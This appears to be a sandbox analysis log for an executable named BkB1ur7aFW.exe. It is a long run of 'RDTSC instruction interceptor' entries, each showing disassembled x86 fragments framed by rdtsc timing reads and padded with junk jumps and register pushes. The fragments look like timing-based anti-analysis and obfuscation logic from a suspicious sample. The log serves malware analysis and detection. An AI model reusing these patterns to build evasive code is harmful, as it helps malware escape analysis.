Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140361 second address: 714037C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AF07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 714037C second address: 7140382 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 714049B second address: 7140523 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD13CB4AF07h 0x00000009 jmp 00007FD13CB4AF03h 0x0000000e popfd 0x0000000f call 00007FD13CB4AF08h 0x00000014 pop ecx 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov eax, dword ptr [ebx+4Ch] 0x0000001b pushad 0x0000001c mov ecx, 5349EB79h 0x00000021 popad 0x00000022 mov dword ptr [esi+10h], eax 0x00000025 jmp 00007FD13CB4AF04h 0x0000002a mov eax, dword ptr [ebx+50h] 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FD13CB4AF07h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140523 second address: 7140529 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140529 second address: 714052D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 714052D second address: 7140615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+14h], eax 0x0000000b jmp 00007FD13D063727h 0x00000010 mov eax, dword ptr [ebx+54h] 0x00000013 pushad 0x00000014 mov si, 01EBh 0x00000018 pushfd 0x00000019 jmp 00007FD13D063720h 0x0000001e add ah, 00000078h 0x00000021 jmp 00007FD13D06371Bh 0x00000026 popfd 0x00000027 popad 0x00000028 mov dword ptr [esi+18h], eax 0x0000002b jmp 00007FD13D063726h 0x00000030 mov eax, dword ptr [ebx+58h] 0x00000033 jmp 00007FD13D063720h 0x00000038 mov dword ptr [esi+1Ch], eax 0x0000003b pushad 0x0000003c mov ebx, esi 0x0000003e push eax 0x0000003f pushfd 0x00000040 jmp 00007FD13D063729h 0x00000045 add eax, 48771326h 0x0000004b jmp 00007FD13D063721h 0x00000050 popfd 0x00000051 pop eax 0x00000052 popad 0x00000053 mov eax, dword ptr [ebx+5Ch] 0x00000056 pushad 0x00000057 pushfd 0x00000058 jmp 00007FD13D06371Dh 0x0000005d add ecx, 487F1C86h 0x00000063 jmp 00007FD13D063721h 0x00000068 popfd 0x00000069 mov edx, ecx 0x0000006b popad 0x0000006c mov dword ptr [esi+20h], eax 0x0000006f pushad 0x00000070 push eax 0x00000071 push edx 0x00000072 movzx esi, di 0x00000075 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140615 second address: 7140645 instructions: 0x00000000 rdtsc 0x00000002 call 00007FD13CB4AEFBh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a movsx edi, ax 0x0000000d popad 0x0000000e mov eax, dword ptr [ebx+60h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD13CB4AF07h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140645 second address: 7140674 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+24h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD13D06371Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140674 second address: 71406D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD13CB4AF07h 0x00000009 add cl, FFFFFFDEh 0x0000000c jmp 00007FD13CB4AF09h 0x00000011 popfd 0x00000012 call 00007FD13CB4AF00h 0x00000017 pop esi 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov eax, dword ptr [ebx+64h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD13CB4AEFCh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71406D1 second address: 71406F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 13D667B4h 0x00000008 mov eax, edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esi+28h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD13D063722h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71406F5 second address: 714070C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AEFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+68h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov bl, ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 714070C second address: 7140724 instructions: 0x00000000 rdtsc 0x00000002 mov eax, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edi, 3DD4B0AEh 0x0000000b popad 0x0000000c mov dword ptr [esi+2Ch], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movzx esi, bx 0x00000015 mov bh, A1h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140724 second address: 7140762 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 7E36h 0x00000007 mov bx, 47C2h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ax, word ptr [ebx+6Ch] 0x00000012 jmp 00007FD13CB4AF09h 0x00000017 mov word ptr [esi+30h], ax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FD13CB4AEFDh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140762 second address: 71407C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063721h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [ebx+00000088h] 0x00000010 pushad 0x00000011 mov cl, 11h 0x00000013 pushfd 0x00000014 jmp 00007FD13D063729h 0x00000019 and cx, 8256h 0x0000001e jmp 00007FD13D063721h 0x00000023 popfd 0x00000024 popad 0x00000025 mov word ptr [esi+32h], ax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FD13D06371Dh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71408AB second address: 71408B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71408B1 second address: 71408B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71408B5 second address: 7140972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+40h], eax 0x0000000b jmp 00007FD13CB4AEFBh 0x00000010 lea eax, dword ptr [ebx+00000080h] 0x00000016 jmp 00007FD13CB4AF06h 0x0000001b push 00000001h 0x0000001d jmp 00007FD13CB4AF00h 0x00000022 nop 0x00000023 pushad 0x00000024 jmp 00007FD13CB4AEFEh 0x00000029 movzx ecx, di 0x0000002c popad 0x0000002d push eax 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FD13CB4AEFAh 0x00000035 add al, FFFFFFD8h 0x00000038 jmp 00007FD13CB4AEFBh 0x0000003d popfd 0x0000003e mov si, B88Fh 0x00000042 popad 0x00000043 nop 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 jmp 00007FD13CB4AF07h 0x0000004c pushfd 0x0000004d jmp 00007FD13CB4AF08h 0x00000052 and ch, FFFFFF98h 0x00000055 jmp 00007FD13CB4AEFBh 0x0000005a popfd 0x0000005b popad 0x0000005c rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140972 second address: 7140978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140978 second address: 71409C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-10h] 0x0000000b jmp 00007FD13CB4AF07h 0x00000010 nop 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushfd 0x00000015 jmp 00007FD13CB4AF02h 0x0000001a and cx, 8358h 0x0000001f jmp 00007FD13CB4AEFBh 0x00000024 popfd 0x00000025 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71409C2 second address: 7140A35 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov si, AE2Bh 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d mov di, BAD2h 0x00000011 mov ch, bl 0x00000013 popad 0x00000014 nop 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FD13D063727h 0x0000001e xor eax, 6481977Eh 0x00000024 jmp 00007FD13D063729h 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007FD13D063720h 0x00000030 adc si, B278h 0x00000035 jmp 00007FD13D06371Bh 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140ABC second address: 7140AD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD13CB4AF01h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140AD1 second address: 7140AF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063721h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp-0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140AF1 second address: 7140B04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AEFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140B04 second address: 7140B19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, ED2Ah 0x00000007 mov dh, B1h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esi+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140B19 second address: 7140B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140B1D second address: 7140B21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140B21 second address: 7140B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140B27 second address: 7140B80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D06371Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+78h] 0x0000000c jmp 00007FD13D063720h 0x00000011 push 00000001h 0x00000013 jmp 00007FD13D063720h 0x00000018 nop 0x00000019 jmp 00007FD13D063720h 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FD13D06371Eh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140B80 second address: 7140BB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD13CB4AEFCh 0x00000009 and si, 6F08h 0x0000000e jmp 00007FD13CB4AEFBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jmp 00007FD13CB4AEFEh 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140BB7 second address: 7140C24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D06371Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-08h] 0x0000000c pushad 0x0000000d call 00007FD13D063724h 0x00000012 pushfd 0x00000013 jmp 00007FD13D063722h 0x00000018 sbb ecx, 577F4EF8h 0x0000001e jmp 00007FD13D06371Bh 0x00000023 popfd 0x00000024 pop esi 0x00000025 mov esi, edx 0x00000027 popad 0x00000028 push ebx 0x00000029 jmp 00007FD13D063720h 0x0000002e mov dword ptr [esp], eax 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 mov dl, 4Bh 0x00000036 mov dx, ax 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140CBA second address: 7140CCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD13CB4AEFCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140CCA second address: 7140CF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a pushad 0x0000000b mov ecx, ebx 0x0000000d mov eax, edi 0x0000000f popad 0x00000010 js 00007FD1AAD220F5h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD13D06371Eh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140CF0 second address: 7140CF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140CF6 second address: 7140CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140CFA second address: 7140CFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140CFE second address: 7140D32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp-04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FD13D063722h 0x00000013 call 00007FD13D063722h 0x00000018 pop esi 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140D32 second address: 7140D4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD13CB4AF07h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140D4D second address: 7140DC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+08h], eax 0x0000000e jmp 00007FD13D06371Eh 0x00000013 lea eax, dword ptr [ebx+70h] 0x00000016 pushad 0x00000017 mov eax, 220AB0CDh 0x0000001c pushfd 0x0000001d jmp 00007FD13D06371Ah 0x00000022 or esi, 27084DE8h 0x00000028 jmp 00007FD13D06371Bh 0x0000002d popfd 0x0000002e popad 0x0000002f push 00000001h 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 push edx 0x00000035 pop esi 0x00000036 call 00007FD13D063727h 0x0000003b pop eax 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140DC4 second address: 7140DF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AF06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov cx, 18FDh 0x0000000f mov ecx, 09FE47F9h 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov bx, cx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140DF3 second address: 7140DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140DF8 second address: 7140DFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140DFE second address: 7140E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140E02 second address: 7140E4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a mov cx, dx 0x0000000d mov si, bx 0x00000010 popad 0x00000011 lea eax, dword ptr [ebp-18h] 0x00000014 jmp 00007FD13CB4AF05h 0x00000019 nop 0x0000001a jmp 00007FD13CB4AEFEh 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FD13CB4AEFEh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140E4B second address: 7140E50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140E50 second address: 7140E63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, 6C359812h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 movsx edi, si 0x00000013 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140EB2 second address: 7140EB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140EB8 second address: 7140EE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a jmp 00007FD13CB4AEFFh 0x0000000f test edi, edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD13CB4AF00h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140EE7 second address: 7140EF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D06371Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140EF6 second address: 7140F8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AF09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FD1AA809692h 0x0000000f pushad 0x00000010 push eax 0x00000011 mov edx, 72859E3Eh 0x00000016 pop edi 0x00000017 mov dx, si 0x0000001a popad 0x0000001b mov eax, dword ptr [ebp-14h] 0x0000001e pushad 0x0000001f push ecx 0x00000020 mov bx, 12EEh 0x00000024 pop edi 0x00000025 movzx esi, bx 0x00000028 popad 0x00000029 mov ecx, esi 0x0000002b jmp 00007FD13CB4AF07h 0x00000030 mov dword ptr [esi+0Ch], eax 0x00000033 pushad 0x00000034 mov eax, 09FFB98Bh 0x00000039 jmp 00007FD13CB4AF00h 0x0000003e popad 0x0000003f mov edx, 74E806ECh 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 pushfd 0x00000048 jmp 00007FD13CB4AEFCh 0x0000004d sbb eax, 24DD5CC8h 0x00000053 jmp 00007FD13CB4AEFBh 0x00000058 popfd 0x00000059 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140F8D second address: 7140FD0 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD13D063728h 0x00000008 adc si, DF28h 0x0000000d jmp 00007FD13D06371Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov edi, eax 0x00000017 popad 0x00000018 sub eax, eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FD13D06371Eh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140FD0 second address: 7141000 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AEFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock cmpxchg dword ptr [edx], ecx 0x0000000d jmp 00007FD13CB4AF06h 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7141000 second address: 7141004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7141004 second address: 7141008 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7141008 second address: 714100E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 714100E second address: 7141014 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7141014 second address: 7141078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a pushad 0x0000000b mov di, si 0x0000000e call 00007FD13D063724h 0x00000013 pushfd 0x00000014 jmp 00007FD13D063722h 0x00000019 and cl, FFFFFFA8h 0x0000001c jmp 00007FD13D06371Bh 0x00000021 popfd 0x00000022 pop esi 0x00000023 popad 0x00000024 jne 00007FD1AAD21D98h 0x0000002a pushad 0x0000002b call 00007FD13D063725h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7141078 second address: 71410E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FD13CB4AF07h 0x0000000b sub si, CB4Eh 0x00000010 jmp 00007FD13CB4AF09h 0x00000015 popfd 0x00000016 popad 0x00000017 mov edx, dword ptr [ebp+08h] 0x0000001a jmp 00007FD13CB4AEFEh 0x0000001f mov eax, dword ptr [esi] 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FD13CB4AF07h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71410E1 second address: 71410E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71410E7 second address: 71410EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71410EB second address: 71410EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71410EF second address: 7141176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx], eax 0x0000000a jmp 00007FD13CB4AF07h 0x0000000f mov eax, dword ptr [esi+04h] 0x00000012 pushad 0x00000013 mov si, 282Bh 0x00000017 pushfd 0x00000018 jmp 00007FD13CB4AF00h 0x0000001d xor esi, 7BA4FFB8h 0x00000023 jmp 00007FD13CB4AEFBh 0x00000028 popfd 0x00000029 popad 0x0000002a mov dword ptr [edx+04h], eax 0x0000002d jmp 00007FD13CB4AF06h 0x00000032 mov eax, dword ptr [esi+08h] 0x00000035 jmp 00007FD13CB4AF00h 0x0000003a mov dword ptr [edx+08h], eax 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 movsx edx, cx 0x00000043 mov ax, 52D5h 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7141176 second address: 7141188 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD13D06371Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7141188 second address: 71411FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+0Ch] 0x0000000b pushad 0x0000000c mov eax, edi 0x0000000e jmp 00007FD13CB4AF09h 0x00000013 popad 0x00000014 mov dword ptr [edx+0Ch], eax 0x00000017 jmp 00007FD13CB4AEFEh 0x0000001c mov eax, dword ptr [esi+10h] 0x0000001f pushad 0x00000020 mov cx, 894Dh 0x00000024 mov edx, esi 0x00000026 popad 0x00000027 mov dword ptr [edx+10h], eax 0x0000002a jmp 00007FD13CB4AF04h 0x0000002f mov eax, dword ptr [esi+14h] 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FD13CB4AF07h 0x00000039 rdtsc
